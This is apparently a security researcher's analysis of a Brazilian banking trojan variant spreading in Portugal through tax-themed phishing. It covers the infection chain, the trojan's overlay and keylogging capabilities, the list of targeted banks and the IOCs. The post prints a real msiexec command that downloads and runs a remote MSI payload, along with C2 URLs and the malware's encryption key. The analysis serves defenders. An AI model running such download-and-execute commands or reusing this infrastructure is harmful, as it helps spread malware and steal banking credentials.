A new variant of a Brazilian trojan has impacted Internet end users in Portugal since last month (February 2022). Although there are no significant differences and sophistication in contrast to other well-known trojans such as Maxtrilha, URSA, and Javali, an analysis of the artifacts and IOCs obtained from this campaign is presented below.
Figure 1 below illustrates the high-level diagram of this new variant and how it operates.
Figure 1: High-level diagram and how this trojan operates.
- The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
- An HTML file downloads a .lnk file mascaraed of an MSI file that takes advantage of the LoL bins to execute an MSI file (segunda.msi).
- “segunda.msi” downloads and executes an EXE file that will drop the final stage.
- The trojan itself installs or modifies Windows trusted certificates, checks by opening windows to perform banking windows overlay to steal credentials, and can deploy additional payloads executed via DLL injection technique.
- The victims’ data is encrypted and sent to the C2 server geolocated in Russia.
The malware takes advantage of a template from the Portuguese Tax services (Autoridade Tributária e Aduaneira) to disseminate the threat in the wild. Maxtrilha – one of the most active trojans in Portugal – uses the same templates to target users. We believe this can be a new variant from Maxtrilha. In addition, most artifacts extracted also matched a threat documented in 2020 and available here. This corroborates the share of code and TTP between Latin American threat groups.
Figure 2: Email template used to lure victims (Autoridade Tributária e Aduaneira – Portuguese Tax services).
The URL available on the email templates downloads an HTML file called “Dividas 2021.html” or “Financas.html” that will download a ZIP file from the Internet. Before downloading the file, the web server-side generates random filenames from a hardcoded list with values related to tax services in the Portuguese language, including: “Finanças.zip“, “divergencias.zip“, “Faturas.zip” and so on.
Figure 3: ZIP file downloaded from the Internet with an MSI file inside.
Playing with LOL bins
After extracting the ZIP file, a .lnk file masked as an MSI is presented (Faturas.lnk – 490f5b97a2754e50a7b67f2e00d2b43b). This file takes advantage of a Living of the Land utility called “msiexec.exe” to download and execute in memory another MSI file (segunda.msi – a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141). With this technique, the second MSI file executes in the background and downloads a new binary.
"C:\Windows\System32\msiexec.exe" /i "https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true"
Figure 4: The second MSI file (a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141) executes in the background and downloads a new binary (WpfApp14.exe).
At this moment, the infection chain is able to bypass the antivirus detection, with the latter EXE (WpfApp14.exe – 4eb39d47ef742996c02a886d56b97aedad904d85cd2ebd57000f6cbbfabe0ea0) with 0/90 detections in VirusTotal at the time of analysis (23-02-2022).
Figure 5: Trojan downloader (4eb39d47ef742996c02a886d56b97aedad904d85cd2ebd57000f6cbbfabe0ea0) with no detections in VirusTotal.
The intent of this binary is the download the last stage of the malware. The binary was developed in Visual Studio .NET and it has a lot of junk code to delay and make hard its analysis. However, somewhere inside the junk, the “FormPool” form is invoked. It downloads two EXE files, the last malware stage, and executes its “loader” (sear.exe).
Figure 6: Download of the next malware stages and execution of the trojan loader.
The last stage
After downloading the two files (ptm.mp4 and teams.mp3), the previous executable renames the file “ptm.mp4” to “sear.exe” and executes it in memory (the trojan loader).
Figure 7: Sear.exe file – the trojan loader – is responsible for unzipping and executing the trojan itself.
Sear.exe is a loader developed in Delphi with the main purpose of extracting the final stage of 3 consecutive rounds of unzipping. The trojan itself is hidden and uses this multi-compression round approach to avoid detection. Finally, the WinEXEC API call is used to execute the trojan itself (teams.exe – ade4119d5fdf574ebe5055359ec7a5cd).
Figure 8: After some rounds of unzipping, the last malware stage is executed via WinExec Windows API call.
MD5 : ade4119d5fdf574ebe5055359ec7a5cd
The last malware stage is a Delphi file similar to other Latin American trojans, including the target banking strings found inside it. The main form “fCentral” is composed of 5 timers that will execute different tasks, including:
- looking for opened windows matching the hardcoded strings and launches the overlay windows attack when the victim accesses specific home banking portals
- collecting keystrokes and clipboard data (keylogger capabilities)
- capturing screenshots and webcam
- obtaining details about the machine, including hostname, AV, available drives, etc
- hijack Windows trusted certificates to provide a proxy channel between criminals and infected machines
Figure 9: “fCentral” form where the malicious code is launched via separated timers.
The overlay process is quite simple and can be explained in Figure 10 below. In short, the trojan uses an ArrayList of target strings compared with the opened windows. If a match is found, the call “AddUsuario()” is invoked to add a new victim into the C2 server. Next, some details about the victim machine are collected, such as hostname, volume information, data/time/region, and the name of the opened window.
Finally, the string is encrypted with a well-known algorithm used in different Latin American threats, and the content is sent to the C2 server.
Figure 10: High-level process of how this trojan adds new victims into the C2 server.
In detail, part of the encryption algorithm (DES+XOR) is present below, and the encryption key found in this variant is the following:
Figure 11: Pseudo-code of the encryption algorithm used to encrypt the communication between the infected machine and its C2 server.
Figure 12: Communication between the infected machine and the C2 server.
The full list of target banking organizations is presented below. It should be noted that most of the target banks are geo-located in Portugal, which indicates that this variant was specifically developed to be disseminated in Portugal.
0073BE20 <UString> 'accesoempresasbanca' 0073BE54 <UString> 'activobank' 0073BE78 <UString> 'aixadirecta' 0073BE9C <UString> 'articulares' 0073BEC0 <UString> 'bancanet' 0073BEE0 <UString> 'bancobest' 0073BF00 <UString> 'bancobpi' 0073BF20 <UString> 'bancoctt' 0073BF40 <UString> 'bancodecomerciohome' 0073BF74 <UString> 'bancomer' 0073BF94 <UString> 'bankia' 0073BFB0 <UString> 'bankinter' 0073BFD0 <UString> 'binance' 0073BFEC <UString> 'bitcoin' 0073C008 <UString> 'bpi' 0073C01C <UString> 'caempresas' 0073C040 <UString> 'caixaagricola' 0073C068 <UString> 'caixabank' 0073C088 <UString> 'caixadirectaonline' 0073C0BC <UString> 'canaisdigitais' 0073C0E8 <UString> 'caonline' 0073C108 <UString> 'citibanamex' 0073C12C <UString> 'digitalbanking' 0073C158 <UString> 'empresas' 0073C178 <UString> 'eurobic' 0073C194 <UString> 'homebank' 0073C1B4 <UString> 'internetbanking' 0073C1E0 <UString> 'itoagricola' 0073C204 <UString> 'loginmillenniumbcp' 0073C238 <UString> 'logintoonlinebanking' 0073C270 <UString> 'metrobank' 0073C290 <UString> 'millennium' 0073C2B4 <UString> 'montepio' 0073C2D4 <UString> 'netbancoempresas' 0073C304 <UString> 'netbancoparticulares' 0073C33C <UString> 'novobanco' 0073C35C <UString> 'openbank' 0073C37C <UString> 'santander' 0073C39C <UString> 'banconacional' 0073C3C8 <UString> 'testetotal' 0073C3EC <UString> 'homebankinglogin'
As observed in other threats, including malware and phishing waves, Brazilian criminals are using C2 servers geo-located in Russia. This threat is a clear sign of this trend.
Figure 13: C2 server geo-located in Russia.
In addition, the trojan downloads another payload from a Brazilian domain that allows criminals to execute arbitrary code on the victim’s side. The data is downloaded into the “\Users\Public” folder in a form of a DLL PE file, and executed into the memory via the DLL injection technique. The rundll32.exe windows utility is used within this context to execute the target payload.
Figure 14: Additional payloads can be downloaded and executed on the target machine.
Nowadays, we are facing a growing of Brazilian trojans at a very high speed. Each one of them with its peculiarities, TTPs, etc. With this in mind, criminals achieve a FUD condition that allows them to avoid detection and impact a large number of users around the world.
In this sense, monitoring these types of IoCs is a crucial point now, as it is expected that in the coming weeks or months new infections or waves can emerge.
Mitre Att&ck Matrix
Indicators of Compromise (IOCs)
-- malicious files hashes -- Financas.html: 2c8776a659aeb890bd5dbf503f5009228851715bd9e8209a3a80830362913c74 Dividas 2021.html: 8e55dd7f837d51370406a267989befab0512cf8cd395effd0a291d77e08a1aec Faturas.zip: 4fc77e2c6f10e377201d252a0190ab92 Faturas lnk file: 490f5b97a2754e50a7b67f2e00d2b43b segunda.msi: a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141 WpfApp14: f6cb005907be5516394525da16d427c7 sear.exe: bc7600b038665c53e126ee1730ca39be teams.exe: 98cf4ad74ed8103aaaf1087cceccea88 -- URLs and C2 -- http://220.127.116.11/feb/ http://18.104.22.168/mqt/dwn.php https://futurenow.webcindario.com/config.php http://22.214.171.124/tst/ins_cont.php --decryption key-- key="YUQL23KL23DF90WI5E1JAS467NMCXXL6JAOAUWWMCL0AOMM4A4VZYW9KHJUI2347EJHJKDF3424SKL K3LAKDJSL9RTIKJ" -- internal paths-- G:\meus\codigos\0 - meus replicados\trabalho externo\euller\project novo\api\icsv844\Source\OverbyteIcsWndControl.pas G:\meus\codigos\0 - meus replicados\trabalho externo\euller\project novo\api\icsv844\Source\OverbyteIcsWSocket.pas
Online sandbox: https://app.any.run/tasks/958448f8-3d1c-4ec1-9454-b4b72cb0c278/
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.